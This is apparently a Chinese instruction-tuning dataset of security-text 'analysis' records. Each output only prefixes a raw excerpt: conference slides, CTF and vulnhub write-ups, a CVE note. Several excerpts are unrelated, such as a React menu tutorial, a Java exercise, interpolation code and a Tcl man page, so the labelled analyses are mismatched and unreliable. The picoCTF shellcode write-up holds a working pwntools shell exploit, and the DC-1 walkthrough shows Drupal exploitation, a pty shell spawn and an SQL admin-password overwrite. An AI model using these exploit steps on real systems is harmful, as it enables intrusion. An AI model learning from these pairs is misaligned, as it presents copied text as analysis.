{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSatellite's Gone... Works in progress Major Malfunction aka Adam Laurie adam@algroup.co.uk http://rfidiot.org Who Am I?  CoPublisher APACHESSL  DEFCON 'goon'  Open Source developer / researcher  Bluetooth  RFID  Full Disclosure / White Hat!  Freelance research / training / lecturing Feed Hunting  Look for 'interesting' satellite feeds  Scan all frequencies  Scan all satellites  Report on mailing lists / forums Poking in the dark Poking in the dark Poking in the dark Poking in the dark There must be a better way!  Visualisation is your friend  Human Brain likes images  Recognise food  Recognise danger  Recognise friends There must be a better way!  Visualisation is your friend  Human Brain likes images  Recognise food  Recognise danger  Recognise friends  Watch pr0n!! Visual Representations Visual Representations Visual Representations Time travel  day 1 Time travel  day 2 That was then...  Proprietary control systems  Undocumented  Reluctant manufacturers  Special hardware / interface converters  Motor Control  Signal Status  to RS232 This is now...  Open standards  DVB Cards  Embedded Linux Receivers  Dreambox  Tuxbox based  GPL source code  Cross compilers This is now...  Web Interface  Select programming  Steer dish  Examine feed properties Web Interface Stream Info Stream Info Stream Info  dvbsnoop  DVB and MPEG stream analyzer  WireShark for DVB  Access to raw data from DVB card  Decode known PIDs http://dvbsnoop.sourceforge.net Stream Info Stream Info Stream Info Stream Info Stream Info Stream Info Stream Info Stream Info Stream Info Taking over the Dreambox  Avoid programming  Analyse config files  Tools to tweak and update  Use existing Web Interface URLS  Use remote tools via IP  ssh / scp  dvbsnoop  tun/tap Taking over the Dreambox Taking over the Dreambox dreaMMap  python (yay!) script  Grab URL  Read status from returned webpage  Create 3D model This is now... This is now... 3D model capabilities  Point & Click  Steer to sat/freq  Decode DVB/Audio within", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCVE-2022-22972 VMware Workspace ONE Access Authentication Bypass RCE author:Y4er 补丁对比 HW-156875-Appliance-21.08.0.1/frontend-0.1.war中增加了一个HostHeaderFilter匹配全路由 然后删除了DBConnectionCheckController这个地方有jdbc attack 权限绕过 查看HostHeaderFilter代码 package ; import VisibleForTesting; import GlobalConfigService; import HorizonPropertyHolder; import ApplianceNetworkDetails; import ApplianceUtil; import IOException; import Optional; import Filter; import FilterChain; import FilterConfig; import ServletException; import ServletRequest; import ServletResponse; import HttpServletRequest; import HttpServletResponse; import StringUtils; import Logger; import LoggerFactory; import Autowired; import Component; @Component(\"HostHeaderFilter\") public class HostHeaderFilter implements Filter { private static final Logger log = LoggerFactory.getLogger(HostHeaderFilter.class); private static final String LOCALHOST = \"localhost\"; private static final String LOCALHOST_IP_ADDRESS = \"127.0.0.1\"; private static final int INVALID_HOST_NAME_STATUS_CODE = 444; @Autowired private HorizonPropertyHolder horizonPropertyHolder; @Autowired private ApplianceUtil applianceUtil; @Autowired private GlobalConfigService globalConfigService; private ApplianceNetworkDetails applianceNetworkDetails = null; private Boolean isOnPremise; private Boolean isSingleTenant; public HostHeaderFilter() { this.isOnPremise = Boolean.FALSE; this.isSingleTenant = Boolean.FALSE; } public void init(FilterConfig filterConfig) throws ServletException { } public void doFilter(ServletRequest request, ServletResponse response, FilterChain filterChain) throws IOException, ServletException { this.isOnPremise = this.globalConfigService.isServiceOnPrem(); com.vmware.horizon com.google.common.annotations. com.tricipher.saas.action.api. com.vmware.horizon.common.utils. com.vmware.horizon.common.utils.system. com.vmware.horizon.common.utils.system. java.io. java.util. javax.servlet. javax.servlet. javax.servlet. javax.servlet. javax.servlet. java", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# react-burger-menu > 目前使用数最多的侧边栏插件 因为我们用 `create-react-app` 创建的 React 环境 所以在这里我们使用 React 的组件形式 ### 装包 ``` npm install react-burger-menu --save ``` ### 使用 #### 首先导入组件 ```js import { slide as Menu } from 'react-burger-menu' ``` #### 将需要的侧边栏的项目放在`<Menu>`内 ```html <Menu> <a href='' /> </Menu> ``` #### 贴入 CSS 样式进行定制自己需要的样式 ```css /* Position and sizing of burger button */ .bm-burger-button { position: fixed; width: 36px; height: 30px; left: 36px; top: 36px; } /* Color/shape of burger icon bars */ .bm-burger-bars { background: #373a47; } /* Position and sizing of clickable cross button */ .bm-cross-button { height: 24px; width: 24px; } /* Color/shape of close button cross */ .bm-cross { background: #bdc3c7; } /* General sidebar styles */ .bm-menu { background: #373a47; padding: 2.5em 1.5em 0; font-size: 1.15em; } /* Morph shape necessary with bubble or elastic */ .bm-morph-shape { fill: #373a47; } /* Wrapper for item list */ .bm-item-list { color: #b8b7ad; padding: 0.8em; } /* Styling of overlay */ .bm-overlay { background: rgba(0, 0, 0, 0.3); } ``` **小贴士**一般我们修改别人的样式或者插件的样式时不是直接删除 重写 覆盖而是在下面写一个自己定制的样式 ```css /* Liu custom */ /* Position and sizing of burger button */ .bm-burger-button { position: fixed; width: 18px; height: 12px; left: 20px; top: 46px; } ``` #### 利用插件自带的属性进行修改 - Position > 默认情况下菜单从左边打开 要从右边打开需要使用正确的道具 它只是一个布尔值所以你不需要指定一个值 然后使用CSS设置按钮的位置 ```js <Menu right /> ``` - Width > 可以使用宽度限定符指定菜单的宽默认值是300 ```js <Menu width={ 280 } /> <Menu width={ '280px' } /> <Menu width={ '20%' } /> ``` - 是否打开 > 你可以控制侧边栏是否打开或关闭与开放的道具默认值为false ```js <Menu isOpen /> ``` - 状态的变化 > 你可以检测到侧边栏是否打开或关闭通过回调函数OnStateChange 回调将接收一个包含新状态作为第一个参数的对象 ```js var isMenuOpen = function(state) { return state.isOpen } <Menu onStateChange={ isMenuOpen } /> ``` - 覆盖 > 你可以关掉默认覆盖无叠加 ```js <Menu noOverlay /> ``` ### 怎么解决路由跳转时侧边栏直接消失的问题 > 利用插件的`isOpen`使侧边栏先消失再跳转 在组件中创建一个`isOpen`状态值写一个方法用来控制这个状态值 最后用这个状态去控制插件的 isOpen 将这个方法绑定到需要跳转的路由上就可以解决这个问题 ```js import React from 'react' import { slide as Menu } from 'rea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nD0 N0 H4RM: A HEALTHCARE SECURITY CONVERSATION D0#No#H4rm# a#healthcare#security#conversation# D0 N0 H4RM: A HEALTHCARE SECURITY CONVERSATION D0#No#H4rm# a#healthcare#security#conversation# Fireside Fireside Hax Moderators Christian#Dameff,#MD# UC#San#Diego# Jeff#Tully,#MD# UC#Davis# Josh#Corman# CSO#PTC# I#Am#The#Cavalry# Beau#Woods# I#Am#The#Cavalry# Special Guest Suzanne Schwartz MD, MBA Associate Director for Science and Strategic Partnerships Food and Drug Administration Featuring Rob#Suárez# Head#of#Product#Security# BD# Jay#Radcliffe# Security#Researcher# Boston#Scientific## David#Nathans# Product#Security#Office# Siemens# Maxwell#Bland# Security#Researcher# UC#San#Diego# Special Guest Seth Carmody, PhD Cybersecurity Project Manager Food and Drug Administration SHOUT OUTS Joel Cardella Product Security Director Thermo-Fisher Nick van Terheyden, MD Founder, Incremental Healthcare Shawn Merdinger Security Researcher Ricky Dhaliwal, MD JD Colorado Permanente Janine Medina DEF CON Biohacking Village Project Manager Jessica Wilkerson Professional Staff Member House Energy and Commerce Audra Hatch Security Researcher The$Doctor$ Sir#Luke#Fildes#1887$ The$Doctor$ Sir#Luke#Fildes#1887$ #d0n0h4rm# Challenges and Opportunities", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### [第五十一课项目回忆体系的本质是知识点串联](../Chapter1/51_项目回忆体系的本质是知识点串联.md) ### [第五十二课渗透的本质是信息搜集](../Chapter1/52_渗透的本质是信息搜集.md) ### [第五十三课内网渗透中的文件传输](../Chapter1/53_内网渗透中的文件传输.md) ### [第五十四课基于Powershell做Socks 4-5代理](../Chapter1/54_基于Powershell做Socks4-5代理.md) ### [第五十五课与Smbmap结合攻击](../Chapter1/55_与Smbmap结合攻击.md) ### [第五十六课离线提取目标机hash](../Chapter1/56_离线提取目标机hash.md) ### [第五十七课高级持续渗透-第一季关于后门](../Chapter1/57_高级持续渗透-第一季关于后门.md) ### [第五十八课高级持续渗透-第二季关于后门补充一](../Chapter1/58_高级持续渗透-第二季关于后门补充一.md) ### [第五十九课高级持续渗透-第三季关于后门补充二](../Chapter1/59_高级持续渗透-第三季关于后门补充二.md) ### [第六十课高级持续渗透-第四季关于后门](../Chapter1/60_高级持续渗透-第四季关于后门.md)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# shellcode Binary Exploitation, 200 points ## Description: > This program executes any input you give it. Can you get a shell? ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #define BUFSIZE 148 #define FLAGSIZE 128 void vuln(char *buf){ gets(buf); puts(buf); } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); // Set the gid to the effective gid // this prevents /bin/sh from dropping the privileges gid_t gid = getegid(); setresgid(gid, gid, gid); char buf[BUFSIZE]; puts(\"Enter a string!\"); vuln(buf); puts(\"Thanks! Executing now...\"); ((void (*)())buf)(); return 0; } ``` ## Solution: We'll use pwntools' \"shellcode\" module to generate a shellcode: ```python from pwn import * import argparse import os EXECUTABLE = \"vuln\" LOCAL_PATH = \"./\" REMOTE_PATH = \"/problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed/\" SSH_SERVER = \"2018shell3.picoctf.com\" def get_process_path(is_ssh = False): if is_ssh or os.path.exists(REMOTE_PATH): return REMOTE_PATH + EXECUTABLE else: return LOCAL_PATH + EXECUTABLE def get_process(ssh_user = None): is_ssh = ssh_user is not None path = get_process_path(is_ssh) params = {\"argv\": path, \"cwd\": os.path.dirname(path)} if is_ssh: s = ssh(host=SSH_SERVER, user=ssh_user) p = s.process(**params) else: p = process(**params) return p parser = argparse.ArgumentParser() parser.add_argument(\"-s\", \"--ssh_user\", help=\"Connect via SSH with the given username\") args = parser.parse_args() context.binary = get_process_path() p = get_process(args.ssh_user) shellcode = shellcraft.sh() print \"Shellcode:\" print shellcode payload = asm(shellcode) p.sendlineafter(\"Enter a string!\", payload) p.interactive() ``` Output: ```console root@kali:/media/sf_CTFs/pico/shellcode# python exploit.py --ssh_user=$pico_ssh_user [*] '/media/sf_CTFs/pico/shellcode/vuln' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments [+] Connecting ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ns=\"\"\"0; 35.645592; 50.951123; 20; 35.144068; 50.467725; 40; 34.729775; 48.204541; 60; 34.204433; 46.117139; 80; 33.602623; 44.908643; 100; 33.162285; 42.337842; 120; 33.712359; 40.140576; 140; 33.931410; 38.580518; 150; 33.894940; 37.745557; 170; 33.474422; 36.273389; 190; 35.32583531; 35.663648; 210; 33.130089; 35.19047214; 220; 32.409544; 35.141797; 230; 32.085525; 34.786115; \"\"\" x=[] y1=[] y2=[] for line in s.split(\"\\n\")[:-1]: line=line.split(\";\") x.append(float(line[0])) y1.append(float(line[1])) y2.append(float(line[2])) import numpy as np import matplotlib.pyplot as plt x=np.asarray(x) y1=np.asarray(y1) y2=np.asarray(y2) def coef(x, y): x.astype(float) y.astype(float) n = len(x) a = [] for i in range(n): a.append(y[i]) for j in range(1, n): for i in range(n-1, j-1, -1): a[i] = float(a[i]-a[i-1])/float(x[i]-x[i-j]) return np.array(a) # return an array of coefficient def Eval(a, x, r): x.astype(float) n = len( a ) - 1 temp = a[n] for i in range( n - 1, -1, -1 ): temp = temp * ( r - x[i] ) + a[i] return temp # return the y_value interpolation print Eval(coef(x,y1), x, 180) print Eval(coef(x,y2), x, 180)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n本文内容来自Gu师傅的博客 http://hackergu.com/ 挑选了几个比较有代表性的靶机来捋一下渗透思路 DC1 靶机下载地址 https://www.vulnhub.com/entry/dc-1,292/ 渗透思路 信息收集主机发现和端口扫描 漏洞利用Drupal CMS GetShell 权限提升SUID提权 信息收集 主机发现 基于ARP arp 可以轻易bypass掉各类应用层防火墙除非是专业的 arp 防火墙 基于ICMP 端口扫描服务探测 nmap 在扫描的过程中使用了 nmap 的 vuln 脚本这个脚本用于检测目标主机是否有常见的漏洞 扫描结果太长就不贴了关键信息是目标开放了80端口打开是一个 Drupal 7 的网站 写一些小拓展 我们可以在谷歌中使用Google Hack大量查找 Drupal 的网站语法为 inurl:\"q=user/password\" 我们在实战中为快速得知 Drupal 的版本我们可以在 robots.txt 中查找 MAINTAINERS.txt 文件该 文件中会泄露版本号 sudo netdiscover -r 192.168.234.0/16 -i eth0 #Linux arp-scan.exe -t 192.168.234.0/24 #Windows for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.234.%I | findstr \"TTL=\" nmap -T4 -Pn -A 192.168.234.176 --script=vuln #-T4 设置扫描时序时序越高速度越快最高为4 #-Pn 不使用ping目标防火墙禁止ping的时候用 漏洞利用 我们在kali中使用 searchsploit 对 drupal 进行查找可以利用的漏洞 searchsploit https://github.com/offensive-security/exploitdb 在 searchsploit 的结果中看到几个漏洞可以通过 MSF 进行利用打开 MSF 搜寻exp searchsploit Drupal 我们的目标网站刚好处在可利用范围内 目标机器上线漏洞利用成功 exp设置要注意几点 通常我们的web服务都是搭建在80端口所以该exp默认帮我们填写了80端口 如果该web服务不在80端口而在888端口则我们需要将端口设置为888 另外关于 targeturi 如果该 CMS 在搭建在 /abc 目录下则需要设置 targeturi 为 /abc  寻找Flag Flag1 use 4 info #查看exp详细的信息 meterpreter> ls #查看文件列表找到Flag1 meterpreter> cat Flag1.txt 显而易见就是让我们寻找web的配置文件 Flag2 cat web.config 发现啥也没有忽然想起是CMS的配置文件 然后查找了一番最终确定要找的配置文件为 www/sites/default 中的settings.php 提示暴力和字典攻击并不是获得访问权限的唯一方法而且您需要访问权限你能用这些凭 证做什么 给出了MySQL的账号密码当然是先去登录啊 Flag3 利用python获取交互Shell python -c '__import__(\"pty\").spawn(\"/bin/bash\")' 登录MySQL 我们最关注的应该就属user表了所以直奔主题 在 flag2 中提示到破解不是唯一的办法 在这里我们可以直接利用update修改 admin 的密码但由于该密码是加密的所以我们也需要找到相 对应的 加密脚本  最终在网站根目录下的 scripts目录 中找到了加密脚本 password-hash.sh  这里遇到了点小问题怎么加密也不成功结果在用法里发现 mysql -u dbuser -p 若不是以root权限运行脚本则需要从网站的根目录去进行调用 ./scripts/password-hash.sh \"admin\" 得到 $S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2 登录MySQL跟新管理员密码 以新密码登录 admin 账号找到 flag3 Flag4 在摸索hash脚本的时候无意发现的按照常理的话/etc/passwd中也可发现 位于 /home 目录下 提示我们需要进行提权才能得到 flag5  update users set pass='$S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2' where uid=1; 权限提升Flag5 flag3中的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 57.2 和为 S 的连续正数序列 ## 题目描述 [牛客网](https://www.nowcoder.com/practice/c451a3fd84b64cb19485dad758a55ebe?tpId=13&tqId=11194&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 输出所有和为 S 的连续正数序列例如和为 100 的连续序列有 ``` [9, 10, 11, 12, 13, 14, 15, 16] [18, 19, 20, 21, 22] ``` ## 解题思路 ```java public ArrayList<ArrayList<Integer>> FindContinuousSequence(int sum) { ArrayList<ArrayList<Integer>> ret = new ArrayList<>(); int start = 1, end = 2; int curSum = 3; while (end < sum) { if (curSum > sum) { curSum -= start; start++; } else if (curSum < sum) { end++; curSum += end; } else { ArrayList<Integer> list = new ArrayList<>(); for (int i = start; i <= end; i++) list.add(i); ret.add(list); curSum -= start; start++; end++; curSum += end; } } return ret; } ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nConfidential and proprietary information of Verint Systems Inc.  All rights reserved worldwide 1 Changing the Mindset of Cyber Defense Detecting the Intent, Not just the Technique Vadim Pogulievsky Director of Cyber Research, Verint Confidential and proprietary information of Verint Systems Inc.  All rights reserved worldwide 2 About me  Vadim Pogulievsky  Director of Cyber Research at Verint  Building Cyber Security products for last 15 years  Previously led Cyber Security Research teams for Finjan, M86 Security and McAfee Confidential and proprietary information of Verint Systems Inc.  All rights reserved worldwide 3 Confidential and proprietary information of Verint Systems Inc.  All rights reserved worldwide 3 Current industry state Seeing a big picture Can it be better? What we should do as an industry to improve it? Agenda Confidential and proprietary information of Verint Systems Inc.  All rights reserved worldwide 4 Confidential and proprietary information of Verint Systems Inc.  All rights reserved worldwide 5 Hackers Attack Every 39 Seconds One in Three Americans Hacked in the Past Year  Cyber crime damage costs to hit $6 trillion annually by 2021 Around one billion accounts and records were compromised worldwide in 2016  Cyber crime will more than triple the number of unfilled cybersecurity jobs, which is predicted to reach 3.5 million by 2021 On the other hand.. Confidential and proprietary information of Verint Systems Inc.  All rights reserved worldwide 6 Confidential and proprietary information of Verint Systems Inc.  All rights reserved worldwide 6 So, why thats the situation? + Because we compare instead of cooperate + Because every single security product is built in a way its the only product installed in customers network + Because customer has to build a cyber defense ecosystem from products that werent built to be a part of an ecosystem Confidential and proprietary information of Verint Systems Inc.  All rights reserved worldwide 7 High FP rate", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 DEFCON 2018 USA ALEXANDRE BORGES RING 0/-2 ROOKITS : COMPROMISING DEFENSES DEFCON 2018 - USA ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER PROFILE AND TOC TOC:  Introduction  Rootkits: Ring 0  Advanced Malwares and Rootkits: Ring -2  Malware and Security Researcher.  Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics, Rootkits and Software Exploitation.  Member of Digital Law and Compliance Committee (CDDC/ SP)  Reviewer member of the The Journal of Digital Forensics, Security and Law.  Refereer on Digital Investigation:The International Journal of Digital Forensics & Incident Response  Instructor at Oracle, (ISC)2 and Ex-instructor at Symantec. 2 DEFCON 2018 - USA ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER ACKNOWLEDGMENT DEFCON 2018 - USA 3 Joanna Rutkowska John Loucaides Oleksandr Bazhaniuk Sergey Bratus Vicent Zimmer Yuriy Bulygin Xeno Kovah Alex Bazhaniuk Alex Matrosov Andrew Furtak Bruce Dang Corey Kallenberg Dmytro Oleksiuk Engene Rodionov These professionals deserve my sincere thank you and deep respect for their researches on these topics. I have learned from their explanations and articles. By the way, I continue learning... ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER DEFCON 2018 - USA 4 INTRODUCTION ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER RING 0/-2 ROOTKITS DEFCON 2018 - USA 5 ADVANCED MALWARES:  MBR/VBR/UEFI rootkits  Tecniques used by rootkits  Kernel Code Signing Bypasses  MBR + IPL infection  BIOS, UEFI and boot architecture  Boot Guard  Secure Boot attacks  WSMT (Windows SMM Security  Mitigation Table)  BIOS Guard  BIOS/UEFI Protections RING 0:  Kernel Callback methods  WinDbg structures  Kernel Drivers Structures  Malicious Drivers  Modern C2 communication  Kernel Pools and APCs ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER DEFCON 2018 - USA 6 ROOTKITS: RING 0 ALEXANDRE BORGES - MALWARE AND SECURITY RESEARCHER ROOTKITS: RING 0 7  Kernel Callback Functions, which are are a k", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Puzz-word Category: Programming, 300 Points ## Description > One of my colleagues just loves puzzles. > > He wrote this API that you can send and get a puzzle, and if you can solve it, you get the secret key to his bitcoin fortune. > > We couldn't get it :( > > Can you? ## Solution Let's check the attached service: ```console (user@kali)-[/media/sf_CTFs/checkpoint/Puzz-word] $ curl https://puzzword.csa-challenge.com/help Hello. To get your puzzle go to /puzzle instead of this /help. The puzzle is a peg solitaire game. You are probably familiar with it, but if not, you can read about it online, or even play it here: https://www.webgamesonline.com/peg-solitaire/ When you go to /puzzle, you will get the source and destination, and you will need to provide your solution. The source will look something like this: | OOO | | OOO | |OOOOOOOOO| |OOOO.OOOO| |OOOOOOOOO| | OOO | | OOO | If you are familiar with this game, or you've just read about it, then you know what you need to do: The pieces that are marked with 'O' can move above other pieces to an empty spot on the board (marked with '.') The piece that you are jumping above will be taken out of the board. You will need to provide the solution that will reach the destination. The destination will look something like this: | ... | | ... | |.........| |....O....| |.........| | ... | | ... | The solution is the series of steps that will get you to the destination. To describe a step we can use a coordinate system where 0,0 is the top left, 8,0 is top right 0,8 is bottom left and 8,8 is bottom right. To describe the direction we can just use arrow-like characters: < means left > means right and  and v mean up and down The solution will be an array of moves that you need to send the /solve API This should be a field in the JSON body of a POST request Each move has 3 elements: x, y and direction. For example: {\"solution\": [[4,1,\"v\"], [6,2,\"<\"],......,[4,5,\"\"]]} In these first two steps we moved two pieces, and the board now ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1994 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: subst.n,v 1.2 2003/11/24 05:10:00 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 UPnProxyPot: fake the funk, become a blackhat proxy, MITM their TLS, and scrape the wire. 2 d1rt Chad Seaman 3 Akamai SIRT Team Lead & Senior Engineer 4 5 First things first INTERNET OF THINGS What is IoT? 6 First things first INTERNET OF THINGS What is IoT? TRASH 7 Your abstract sucked, what is this about? SSDP & UPnP have been widely vulnerable on IoT devices for nearly 20 years... It is not only possible, but also very easy to turn these devices into proxy servers... When attackers find vulnerable IoT devices susceptible to this kind of attack, they turn the device into a short lived proxy server and delete their tracks when theyre done and/or the rules self destruct after their TTL expires... Well cover SSDP & UPnP, previous UPnProxy research/campaigns, and finally UPnProxyPot, how it works, and findings from a year of geographically distributed deployments... TL;DW 8 What are those things? SSDP & UPnP SSDP: Simple Service Discovery Protocol - Built for the LAN, uses broadcast addressing with HTTP over UDP - machines on a LAN announce themselves and find network peers that expose services (printing, media sharing, network conf.) UPnP: Universal Plug & Play - Built for the LAN, good ole HTTP & SOAP (<shower><wash what=butt/></shower>) - lets machines on a LAN inquire about services and/or configurations - lets machines on a LAN access services and/or modify configurations 9 Okay, that doesnt sound so bad, whats wrong with them? SSDP & UPnP SSDP: Simple Service Discovery Protocol - IoT devices are notoriously bad at deploying this correctly - built for the LAN better expose it on the WAN just for funsies - DRDoS MVP of 2014/15 still has a seat at the popular DDoS vectors lunch table - Still finding this bullshit with these same old problems on some newer devices (ymmv) UPnP: Universal Plug & Play - Built for the LAN but its deployed on WAN too, of course - LAN is a safe space, so we just do what our trusted network peers tell us to do no auth needed - Informatio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# HeXdump (misc, 202p, 62 solved) In the challenge we get source code of a [service](heXDump.rb) and access to this service. The logic of the application is pretty simple: - We can select `output mode` from MD5, SHA1 and AES hexdump. - We can write some data into the `input file`. - We can request to get back data from the `input file`, respecting the output. mode we selected. - There is a special option which will place the flag file as `input file`. Working with our own data is not very interesting, so the first step is to run the `1337` command to start working with flag file. Now we can get back MD5, SHA1 or AES encrypted data from this file, but it's not enough to recover the flag. It's also not a crypto but misc challenge. The key function is: ```ruby def write puts 'Data? (In hex format)' data = gets return false unless data && !data.empty? && data.size < 0x1000 IO.popen(\"xxd -r -ps - #{@file}\", 'r+') do |f| f.puts data f.close_write end return false unless $CHILD_STATUS.success? true end ``` The data we write to `input file` are put there using `xxd -r -ps - #{@file}`. If we look into the documentation we can see: ``` -r | -revert reverse operation: convert (or patch) hexdump into binary. If not writing to stdout, xxd writes into its output file without truncating it. Use the combination -r -p to read plain hexadecimal dumps without line number information and without a particular column layout. Additional Whitespace and line-breaks are allowed anywhere. ``` Key part is `If not writing to stdout, xxd writes into its output file without truncating it.` This means that if we provide only 1 character as input, it will overwrite only 1st byte. We can use this feature to recover flag byte by byte: 1. Get back original flag output (of any kind, but we can use AES just to be sure there is no accidental collision). 2. Loop over flag charset and overwrite 1st character with each possible value, and get back output. 3. If output with overwritten character matches the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# DevGuru 1 > https://download.vulnhub.com/devguru/devguru.ova.7z 靶场IP`192.168.32.224` 扫描对外端口服务 ``` (rootkali)-[~/Desktop] # nmap -p 1-65535 -sV 192.168.32.224 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 01:23 EDT Nmap scan report for 192.168.32.224 Host is up (0.00096s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 8585/tcp open unknown ``` 访问80端口 ![image-20220911132521914](../../.gitbook/assets/image-20220911132521914.png) 爆破目录 ``` (rootkali)-[/tmp] # dirb http://192.168.32.224/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Sep 11 01:25:29 2022 URL_BASE: http://192.168.32.224/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.32.224/ ---- + http://192.168.32.224/.git/HEAD (CODE:200|SIZE:23) + http://192.168.32.224/.htaccess (CODE:200|SIZE:1678) + http://192.168.32.224/0 (CODE:200|SIZE:12674) + http://192.168.32.224/about (CODE:200|SIZE:18666) + http://192.168.32.224/About (CODE:200|SIZE:18666) + http://192.168.32.224/backend (CODE:302|SIZE:414) ==> DIRECTORY: http://192.168.32.224/config/ + http://192.168.32.224/index.php (CODE:200|SIZE:12724) ==> DIRECTORY: http://192.168.32.224/modules/ ==> DIRECTORY: http://192.168.32.224/plugins/ + http://192.168.32.224/services (CODE:200|SIZE:10038) + http://192.168.32.224/Services (CODE:200|SIZE:10038) ==> DIRECTORY: http://192.168.32.224/storage/ ==> DIRECTORY: http://192.168.32.224/themes/ ==> DIRECTORY: http://192.168.32.224/vendor/ ---- Entering directory: http://192.168.32.224/config/ ---- ---- Entering directory: http://192.168.32.224/modules/ ---- ==> DIRECTORY: http://192.168.32.224/modules/backend/ ==> DIRECTORY: http://192.168.32.224/modules/cms/ ==> DIRECTORY: http://192.168.32.224/modules/system/ ``` 访问`/.git/HEAD` ![image-20220911133800456](../../", "category": "text_analysis", "source": "security_papers"}
